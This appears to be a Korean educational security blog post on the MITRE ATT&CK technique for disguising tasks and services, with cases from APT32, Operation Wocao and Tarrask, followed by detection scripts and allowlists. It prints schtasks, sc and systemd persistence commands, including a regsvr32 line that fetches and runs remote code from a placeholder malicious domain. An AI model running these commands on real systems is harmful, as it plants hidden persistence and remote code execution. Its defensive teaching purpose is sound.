WindowsUpdate와 win32times를 구별할 수 있는가? APT32가 SystemSoundsServices라는 가짜 서비스로 30분마다 악성코드를 실행한 방법.
댓글은 익명으로 작성되며, 삭제 비밀번호를 설정하면 본인만 삭제할 수 있습니다. 비밀번호를 설정하지 않은 댓글은 누구나 삭제할 수 있습니다.
MITRE ATT&CK 프레임워크에서 T1036.004는 "Masquerade Task or Service" 기법으로, 악성 작업이나 서비스를 합법적인 시스템 구성요소로 위장하는 공격이다. 2022년 Microsoft 위협 인텔리전스팀 보고서에 따르면, 이 기법을 사용한 Tarrask 악성코드는 수개월간 탐지를 회피했으며, APT32 그룹은 SystemSoundsServices라는 이름으로 Windows 음향 서비스를 흉내낸 스케줄된 작업을 생성했다.
이런 공격이 성공하는 이유는 간단한다. Windows 시스템에는 수백 개의 합법적인 작업과 서비스가 실행되고 있어서, W32Time과 win32times 같은 미묘한 차이를 관리자가 일일이 확인하기 어렵기 때문이다.
과거 악성코드는 단순히 실행되기만 하면 됐다. 하지만 EDR(Endpoint Detection and Response) 솔루션과 행동 기반 탐지가 발달하면서, 공격자들은 새로운 은신 전략이 필요했다.
기존 방식의 한계:
malware.exe, hack.bat)T1036.004가 해결하는 문제:
이 기법은 사회공학의 시각적 버전이다. 사람이 눈으로 보기에 정상적으로 보이도록 속이는 것이다.
Masquerade Task or Service: Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description. Windows services will have a service name as well as a display name. — MITRE ATT&CK T1036.004
한 문장으로 정의하면, 합법적인 시스템 작업이나 서비스의 이름을 모방하여 악성 코드가 정상적인 구성요소인 것처럼 위장하는 기법이다.
핵심 구성 요소:
| 용어 | 설명 |
|---|---|
| Task Masquerading | 대상: 스케줄된 작업 / 조작 방법: schtasks 명령어 / 지속성: 높음 (재부팅 후 유지) |
| Service Masquerading | 대상: Windows 서비스 / 조작 방법: sc create 명령어 / 지속성: 매우 높음 (자동 시작) |
| Process Masquerading | 대상: 실행 중 프로세스 / 조작 방법: 프로세스명 변경 / 지속성: 낮음 (프로세스 종료 시 사라짐) |
| File Masquerading | 대상: 실행 파일 / 조작 방법: 파일명 위장 / 지속성: 중간 (파일 삭제 전까지) |
공격자가 가장 자주 사용하는 방법은 Windows의 작업 스케줄러를 악용하는 것이다. 정상적인 시스템 작업과 구별하기 어려운 이름을 사용한다.
실제 공격 명령어:
schtasks /create /ru system /sc daily /tr "cmd /c powershell.exe -ep bypass -file c:\temp\update.ps1" /tn "WindowsUpdateCheck" /f
각 매개변수 분석:
/ru system - SYSTEM 권한으로 실행 (높은 신뢰도)/sc daily - 매일 실행 (지속성 확보)/tn "WindowsUpdateCheck" - 정상적인 업데이트 작업으로 위장/f - 기존 작업이 있으면 덮어쓰기더 정교한 공격자는 Windows 서비스로 등록한다. 서비스는 작업보다 더 높은 신뢰도를 얻을 수 있다.
sc create "Windows Security Update" binpath= "C:\Windows\System32\svchost.exe -k netsvcs -p -s malicious" start= auto
sc description "Windows Security Update" "Provides automatic security updates for Windows components"
위장 전략:
svchost.exe 사용 (정상 시스템 프로세스)Linux 환경에서는 systemd 서비스 파일을 조작한다.
# /etc/systemd/system/system-update.service
[Unit]
Description=System Update Service
After=network.target
[Service]
Type=simple
ExecStart=/usr/local/bin/system_updater
Restart=always
User=root
[Install]
WantedBy=multi-user.target
활성화 과정:
systemctl daemon-reload
systemctl enable system-update.service
systemctl start system-update.service
다이어그램
이 공격이 성공하는 핵심 원리는 인지적 편향을 악용하는 것이다:
비유로 설명하면, 이는 마치 가짜 명함을 들고 회사에 들어가는 것과 같다. 명함에 "IT 보안팀"이라고 적혀 있으면, 사람들은 자세히 확인하지 않고 출입을 허용한다.
공격자는 다음 3가지 인간의 한계를 노립니다:
Operation Wocao (2019-2021) 중국 연계 위협 행위자가 사용한 기법:
schtasks /create /ru system /sc onstart /tr "C:\Windows\System32\cmd.exe /c C:\Windows\Temp\win32times.bat" /tn win32times /f
위장 전략:
W32Time (Windows Time Service)win32times (미묘한 차이)/sc onstart)APT32 (Ocean Lotus) 베트남 연계 그룹의 VBA 매크로 공격:
Shell "schtasks /create /sc minute /mo 30 /tn SystemSoundsServices /tr ""regsvr32.exe /s /u /i:https://malicious-domain.com/config.sct scrobj.dll"" /ru system /f"
위장 포인트:
SystemSoundsServices - Windows 시스템 사운드 서비스로 위장regsvr32.exe 사용으로 정상적인 시스템 도구 악용Tarrask 악성코드 (2022) Microsoft가 발견한 고급 위장 기법:
schtasks /create /xml "C:\temp\task.xml" /tn "MicrosoftEdgeUpdateTaskMachine"
task.xml 내용:
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.4">
<RegistrationInfo>
<Description>Keeps Microsoft Edge up to date</Description>
</RegistrationInfo>
<Actions>
<Exec>
<Command>C:\Windows\System32\cmd.exe</Command>
<Arguments>/c powershell.exe -ep bypass -file C:\temp\edge_updater.ps1</Arguments>
</Exec>
</Actions>
</Task>
다이어그램기술적 한계:
schtasks, sc 등은 정당한 관리 도구인적 한계:
자동화된 탐지
# 의심스러운 작업 탐지 스크립트
Get-ScheduledTask | Where-Object {
$_.TaskName -match "(?i)(update|security|system|windows)" -and
$_.Actions.Execute -match "(?i)(powershell|cmd|wscript|cscript)"
} | Select-Object TaskName, TaskPath, @{Name="Command";Expression={$_.Actions.Execute + " " + $_.Actions.Arguments}}
화이트리스트 기반 관리
{
"approved_tasks": [
"Microsoft\\Windows\\UpdateOrchestrator\\*",
"Microsoft\\Windows\\WindowsUpdate\\*",
"Microsoft\\Office\\*"
],
"blocked_patterns": [
"*update*",
"*security*",
"*system*"
]
}
모니터링 체크리스트
T1036.004 "작업 또는 서비스 위장" 기법은 공격자가 인간의 인지적 한계와 시스템의 신뢰 메커니즘을 동시에 악용하는 정교한 은신 전략이다. 단순히 기술적 취약점을 노리는 것이 아니라, 관리자의 시각적 패턴 인식과 확증 편향을 노린다는 점에서 사회공학 공격의 기술적 응용이라고 할 수 있다.
이 기법이 특히 위험한 이유는 T1036 위장 공격의 다른 기법들과 결합될 때 탐지 난이도가 기하급수적으로 증가한다는 점이다. 예를 들어 정상 프로세스 위장(T1036.005)과 함께 사용하면, 작업명부터 실행 프로세스까지 모든 것이 정상으로 보이게 된다.
다음에 알아볼 주제:
AI 활용 안내 이 글은 AI(Claude)의 도움을 받아 작성되었습니다. 인용된 통계와 사례는 참고 자료에 명시된 출처에 근거하며, 설명을 위한 일부 표현은 각색되었습니다.
면책 조항 본 글은 보안 인식 제고를 위한 교육 목적으로 작성되었습니다. 언급된 공격 기법을 실제로 시도하는 행위는 「정보통신망법」, 「형법」 등에 따라 처벌받을 수 있으며, 본 블로그는 이에 대한 법적 책임을 지지 않습니다.